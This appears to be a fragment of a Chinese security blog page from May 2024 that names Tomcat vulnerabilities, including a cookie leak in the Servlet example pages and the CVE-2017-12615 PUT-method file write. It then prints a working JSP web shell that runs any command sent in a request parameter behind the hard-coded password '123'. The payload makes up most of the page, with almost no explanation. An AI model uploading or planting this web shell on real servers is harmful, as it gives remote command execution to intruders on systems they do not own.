Close

27 5 月, 2024

(Cookie信息泄露)(CVE-2017-12615)

ApacheTomcat任意身份信息伪造漏洞/Tomcat Servlet示例页面之Cookie信息泄露

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

<% if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1; byte[] b = new byte[1024]; out.print("<pre>");          
        while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); }  %>